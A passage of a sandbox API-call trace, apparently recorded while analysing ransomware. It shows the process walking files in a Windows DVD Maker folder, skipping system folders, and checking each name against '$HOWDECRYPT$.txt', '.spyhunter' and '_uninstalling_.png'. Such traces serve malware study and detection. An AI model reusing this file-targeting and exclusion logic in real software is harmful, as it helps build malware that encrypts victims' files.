[0093.280] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0093.280] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.280] lstrcmpiW (lpString1="btn-back-static.png", lpString2="Windows") returned -1 [0093.280] lstrlenW (lpString="Windows") returned 7 [0093.280] lstrcmpiW (lpString1="btn-back-static.png", lpString2="$Recycle.bin") returned 1 [0093.280] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.281] lstrcmpiW (lpString1="btn-back-static.png", lpString2="System Volume Information") returned -1 [0093.281] lstrlenW (lpString="System Volume Information") returned 25 [0093.281] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png") returned 74 [0093.281] StrStrIW (lpFirst="btn-back-static.png", lpSrch=".spyhunter") returned 0x0 [0093.281] lstrcmpW (lpString1="btn-back-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.281] lstrcmpW (lpString1="btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0093.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png") returned 74 [0093.281] GetProcessHeap () returned 0x2c0000 [0093.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346488 [0093.281] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0093.281] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.281] lstrcmpiW (lpString1="btn-next-static.png", lpString2="Windows") returned -1 [0093.281] lstrlenW (lpString="Windows") returned 7 [0093.281] lstrcmpiW (lpString1="btn-next-static.png", lpString2="$Recycle.bin") returned 1 [0093.281] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.281] lstrcmpiW (lpString1="btn-next-static.png", lpString2="System Volume Information") returned -1 [0093.281] lstrlenW (lpString="System Volume Information") returned 25 [0093.281] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png") returned 74 [0093.281] StrStrIW (lpFirst="btn-next-static.png", lpSrch=".spyhunter") returned 0x0 [0093.281] lstrcmpW (lpString1="btn-next-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.281] lstrcmpW (lpString1="btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0093.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png") returned 74 [0093.281] GetProcessHeap () returned 0x2c0000 [0093.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346d48 [0093.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0093.282] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.282] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="Windows") returned -1 [0093.282] lstrlenW (lpString="Windows") returned 7 [0093.282] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="$Recycle.bin") returned 1 [0093.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.282] lstrcmpiW (lpString1="btn-previous-static.png", lpString2="System Volume Information") returned -1 [0093.282] lstrlenW (lpString="System Volume Information") returned 25 [0093.282] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png") returned 78 [0093.282] StrStrIW (lpFirst="btn-previous-static.png", lpSrch=".spyhunter") returned 0x0 [0093.282] lstrcmpW (lpString1="btn-previous-static.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.282] lstrcmpW (lpString1="btn-previous-static.png", lpString2="_uninstalling_.png") returned 1 [0093.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png") returned 78 [0093.282] GetProcessHeap () returned 0x2c0000 [0093.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377e20 [0093.282] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0093.282] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.282] lstrcmpiW (lpString1="button-bullet.png", lpString2="Windows") returned -1 [0093.282] lstrlenW (lpString="Windows") returned 7 [0093.282] lstrcmpiW (lpString1="button-bullet.png", lpString2="$Recycle.bin") returned 1 [0093.282] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.282] lstrcmpiW (lpString1="button-bullet.png", lpString2="System Volume Information") returned -1 [0093.282] lstrlenW (lpString="System Volume Information") returned 25 [0093.282] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png") returned 72 [0093.283] StrStrIW (lpFirst="button-bullet.png", lpSrch=".spyhunter") returned 0x0 [0093.283] lstrcmpW (lpString1="button-bullet.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.283] lstrcmpW (lpString1="button-bullet.png", lpString2="_uninstalling_.png") returned 1 [0093.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png") returned 72 [0093.283] GetProcessHeap () returned 0x2c0000 [0093.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346648 [0093.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0093.283] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.283] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0093.283] lstrlenW (lpString="Windows") returned 7 [0093.283] lstrcmpiW (lpString1="button-highlight.png", lpString2="$Recycle.bin") returned 1 [0093.283] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.283] lstrcmpiW (lpString1="button-highlight.png", lpString2="System Volume Information") returned -1 [0093.283] lstrlenW (lpString="System Volume Information") returned 25 [0093.283] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png") returned 75 [0093.283] StrStrIW (lpFirst="button-highlight.png", lpSrch=".spyhunter") returned 0x0 [0093.283] lstrcmpW (lpString1="button-highlight.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.283] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0093.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png") returned 75 [0093.283] GetProcessHeap () returned 0x2c0000 [0093.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346808 [0093.283] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0093.283] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.283] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0093.284] lstrlenW (lpString="Windows") returned 7 [0093.284] lstrcmpiW (lpString1="content-background.png", lpString2="$Recycle.bin") returned 1 [0093.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.284] lstrcmpiW (lpString1="content-background.png", lpString2="System Volume Information") returned -1 [0093.284] lstrlenW (lpString="System Volume Information") returned 25 [0093.284] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png") returned 77 [0093.284] StrStrIW (lpFirst="content-background.png", lpSrch=".spyhunter") returned 0x0 [0093.284] lstrcmpW (lpString1="content-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.284] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0093.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png") returned 77 [0093.284] GetProcessHeap () returned 0x2c0000 [0093.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377d38 [0093.284] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0093.284] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.284] lstrcmpiW (lpString1="header-background.png", lpString2="Windows") returned -1 [0093.284] lstrlenW (lpString="Windows") returned 7 [0093.284] lstrcmpiW (lpString1="header-background.png", lpString2="$Recycle.bin") returned 1 [0093.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.284] lstrcmpiW (lpString1="header-background.png", lpString2="System Volume Information") returned -1 [0093.284] lstrlenW (lpString="System Volume Information") returned 25 [0093.284] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png") returned 76 [0093.284] StrStrIW (lpFirst="header-background.png", lpSrch=".spyhunter") returned 0x0 [0093.284] lstrcmpW (lpString1="header-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.284] lstrcmpW (lpString1="header-background.png", lpString2="_uninstalling_.png") returned 1 [0093.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png") returned 76 [0093.285] GetProcessHeap () returned 0x2c0000 [0093.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x377ff0 [0093.285] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0093.285] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.285] lstrcmpiW (lpString1="passport.png", lpString2="Windows") returned -1 [0093.285] lstrlenW (lpString="Windows") returned 7 [0093.285] lstrcmpiW (lpString1="passport.png", lpString2="$Recycle.bin") returned 1 [0093.285] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.285] lstrcmpiW (lpString1="passport.png", lpString2="System Volume Information") returned -1 [0093.285] lstrlenW (lpString="System Volume Information") returned 25 [0093.285] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png") returned 67 [0093.285] StrStrIW (lpFirst="passport.png", lpSrch=".spyhunter") returned 0x0 [0093.285] lstrcmpW (lpString1="passport.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.285] lstrcmpW (lpString1="passport.png", lpString2="_uninstalling_.png") returned 1 [0093.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png") returned 67 [0093.285] GetProcessHeap () returned 0x2c0000 [0093.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358d60 [0093.285] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0093.285] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.285] lstrcmpiW (lpString1="Passport.wmv", lpString2="Windows") returned -1 [0093.285] lstrlenW (lpString="Windows") returned 7 [0093.285] lstrcmpiW (lpString1="Passport.wmv", lpString2="$Recycle.bin") returned 1 [0093.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.286] lstrcmpiW (lpString1="Passport.wmv", lpString2="System Volume Information") returned -1 [0093.286] lstrlenW (lpString="System Volume Information") returned 25 [0093.286] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv") returned 67 [0093.286] StrStrIW (lpFirst="Passport.wmv", lpSrch=".spyhunter") returned 0x0 [0093.286] lstrcmpW (lpString1="Passport.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.286] lstrcmpW (lpString1="Passport.wmv", lpString2="_uninstalling_.png") returned 1 [0093.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv") returned 67 [0093.286] GetProcessHeap () returned 0x2c0000 [0093.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x358610 [0093.286] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0093.286] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.286] lstrcmpiW (lpString1="passportcover.png", lpString2="Windows") returned -1 [0093.286] lstrlenW (lpString="Windows") returned 7 [0093.286] lstrcmpiW (lpString1="passportcover.png", lpString2="$Recycle.bin") returned 1 [0093.286] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.286] lstrcmpiW (lpString1="passportcover.png", lpString2="System Volume Information") returned -1 [0093.286] lstrlenW (lpString="System Volume Information") returned 25 [0093.286] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png") returned 72 [0093.286] StrStrIW (lpFirst="passportcover.png", lpSrch=".spyhunter") returned 0x0 [0093.286] lstrcmpW (lpString1="passportcover.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.286] lstrcmpW (lpString1="passportcover.png", lpString2="_uninstalling_.png") returned 1 [0093.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png") returned 72 [0093.286] GetProcessHeap () returned 0x2c0000 [0093.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x3469c8 [0093.287] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0093.287] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.287] lstrcmpiW (lpString1="PassportMask.wmv", lpString2="Windows") returned -1 [0093.287] lstrlenW (lpString="Windows") returned 7 [0093.287] lstrcmpiW (lpString1="PassportMask.wmv", lpString2="$Recycle.bin") returned 1 [0093.287] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.287] lstrcmpiW (lpString1="PassportMask.wmv", lpString2="System Volume Information") returned -1 [0093.287] lstrlenW (lpString="System Volume Information") returned 25 [0093.287] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv") returned 71 [0093.287] StrStrIW (lpFirst="PassportMask.wmv", lpSrch=".spyhunter") returned 0x0 [0093.287] lstrcmpW (lpString1="PassportMask.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.287] lstrcmpW (lpString1="PassportMask.wmv", lpString2="_uninstalling_.png") returned 1 [0093.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv") returned 71 [0093.287] GetProcessHeap () returned 0x2c0000 [0093.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e3b0 [0093.287] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0093.287] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.287] lstrcmpiW (lpString1="PassportMask_PAL.wmv", lpString2="Windows") returned -1 [0093.287] lstrlenW (lpString="Windows") returned 7 [0093.287] lstrcmpiW (lpString1="PassportMask_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.287] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.287] lstrcmpiW (lpString1="PassportMask_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.287] lstrlenW (lpString="System Volume Information") returned 25 [0093.288] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv") returned 75 [0093.288] StrStrIW (lpFirst="PassportMask_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.288] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.288] lstrcmpW (lpString1="PassportMask_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv") returned 75 [0093.288] GetProcessHeap () returned 0x2c0000 [0093.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346c68 [0093.288] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0093.288] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.288] lstrcmpiW (lpString1="passport_mask_left.png", lpString2="Windows") returned -1 [0093.288] lstrlenW (lpString="Windows") returned 7 [0093.288] lstrcmpiW (lpString1="passport_mask_left.png", lpString2="$Recycle.bin") returned 1 [0093.288] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.288] lstrcmpiW (lpString1="passport_mask_left.png", lpString2="System Volume Information") returned -1 [0093.288] lstrlenW (lpString="System Volume Information") returned 25 [0093.288] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png") returned 77 [0093.288] StrStrIW (lpFirst="passport_mask_left.png", lpSrch=".spyhunter") returned 0x0 [0093.288] lstrcmpW (lpString1="passport_mask_left.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.288] lstrcmpW (lpString1="passport_mask_left.png", lpString2="_uninstalling_.png") returned 1 [0093.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png") returned 77 [0093.288] GetProcessHeap () returned 0x2c0000 [0093.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3781c0 [0093.288] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0093.289] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.289] lstrcmpiW (lpString1="passport_mask_right.png", lpString2="Windows") returned -1 [0093.289] lstrlenW (lpString="Windows") returned 7 [0093.289] lstrcmpiW (lpString1="passport_mask_right.png", lpString2="$Recycle.bin") returned 1 [0093.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.289] lstrcmpiW (lpString1="passport_mask_right.png", lpString2="System Volume Information") returned -1 [0093.289] lstrlenW (lpString="System Volume Information") returned 25 [0093.289] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png") returned 78 [0093.289] StrStrIW (lpFirst="passport_mask_right.png", lpSrch=".spyhunter") returned 0x0 [0093.289] lstrcmpW (lpString1="passport_mask_right.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.289] lstrcmpW (lpString1="passport_mask_right.png", lpString2="_uninstalling_.png") returned 1 [0093.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png") returned 78 [0093.289] GetProcessHeap () returned 0x2c0000 [0093.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x377428 [0093.289] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0093.289] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.289] lstrcmpiW (lpString1="Passport_PAL.wmv", lpString2="Windows") returned -1 [0093.289] lstrlenW (lpString="Windows") returned 7 [0093.289] lstrcmpiW (lpString1="Passport_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0093.289] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.289] lstrcmpiW (lpString1="Passport_PAL.wmv", lpString2="System Volume Information") returned -1 [0093.289] lstrlenW (lpString="System Volume Information") returned 25 [0093.289] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 71 [0093.289] StrStrIW (lpFirst="Passport_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0093.289] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.290] lstrcmpW (lpString1="Passport_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0093.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv") returned 71 [0093.290] GetProcessHeap () returned 0x2c0000 [0093.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e7e8 [0093.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0093.290] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.290] lstrcmpiW (lpString1="play-background.png", lpString2="Windows") returned -1 [0093.290] lstrlenW (lpString="Windows") returned 7 [0093.290] lstrcmpiW (lpString1="play-background.png", lpString2="$Recycle.bin") returned 1 [0093.290] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.290] lstrcmpiW (lpString1="play-background.png", lpString2="System Volume Information") returned -1 [0093.290] lstrlenW (lpString="System Volume Information") returned 25 [0093.290] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png") returned 74 [0093.290] StrStrIW (lpFirst="play-background.png", lpSrch=".spyhunter") returned 0x0 [0093.290] lstrcmpW (lpString1="play-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.290] lstrcmpW (lpString1="play-background.png", lpString2="_uninstalling_.png") returned 1 [0093.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png") returned 74 [0093.290] GetProcessHeap () returned 0x2c0000 [0093.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346568 [0093.290] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0093.290] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.290] lstrcmpiW (lpString1="selection_subpicture.png", lpString2="Windows") returned -1 [0093.290] lstrlenW (lpString="Windows") returned 7 [0093.291] lstrcmpiW (lpString1="selection_subpicture.png", lpString2="$Recycle.bin") returned 1 [0093.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.291] lstrcmpiW (lpString1="selection_subpicture.png", lpString2="System Volume Information") returned -1 [0093.291] lstrlenW (lpString="System Volume Information") returned 25 [0093.291] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png") returned 79 [0093.291] StrStrIW (lpFirst="selection_subpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.291] lstrcmpW (lpString1="selection_subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.291] lstrcmpW (lpString1="selection_subpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png") returned 79 [0093.291] GetProcessHeap () returned 0x2c0000 [0093.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x378390 [0093.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0093.291] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.291] lstrcmpiW (lpString1="travel.png", lpString2="Windows") returned -1 [0093.291] lstrlenW (lpString="Windows") returned 7 [0093.291] lstrcmpiW (lpString1="travel.png", lpString2="$Recycle.bin") returned 1 [0093.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.291] lstrcmpiW (lpString1="travel.png", lpString2="System Volume Information") returned 1 [0093.291] lstrlenW (lpString="System Volume Information") returned 25 [0093.291] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 65 [0093.291] StrStrIW (lpFirst="travel.png", lpSrch=".spyhunter") returned 0x0 [0093.291] lstrcmpW (lpString1="travel.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.291] lstrcmpW (lpString1="travel.png", lpString2="_uninstalling_.png") returned 1 [0093.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\travel.png") returned 65 [0093.292] GetProcessHeap () returned 0x2c0000 [0093.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x358200 [0093.292] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0093.292] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.292] lstrcmpiW (lpString1="TravelIntroToMain.wmv", lpString2="Windows") returned -1 [0093.292] lstrlenW (lpString="Windows") returned 7 [0093.292] lstrcmpiW (lpString1="TravelIntroToMain.wmv", lpString2="$Recycle.bin") returned 1 [0093.292] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.292] lstrcmpiW (lpString1="TravelIntroToMain.wmv", lpString2="System Volume Information") returned 1 [0093.292] lstrlenW (lpString="System Volume Information") returned 25 [0093.292] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 76 [0093.292] StrStrIW (lpFirst="TravelIntroToMain.wmv", lpSrch=".spyhunter") returned 0x0 [0093.292] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.292] lstrcmpW (lpString1="TravelIntroToMain.wmv", lpString2="_uninstalling_.png") returned 1 [0093.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMain.wmv") returned 76 [0093.292] GetProcessHeap () returned 0x2c0000 [0093.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0093.292] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0093.292] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.292] lstrcmpiW (lpString1="TravelIntroToMainMask.wmv", lpString2="Windows") returned -1 [0093.292] lstrlenW (lpString="Windows") returned 7 [0093.292] lstrcmpiW (lpString1="TravelIntroToMainMask.wmv", lpString2="$Recycle.bin") returned 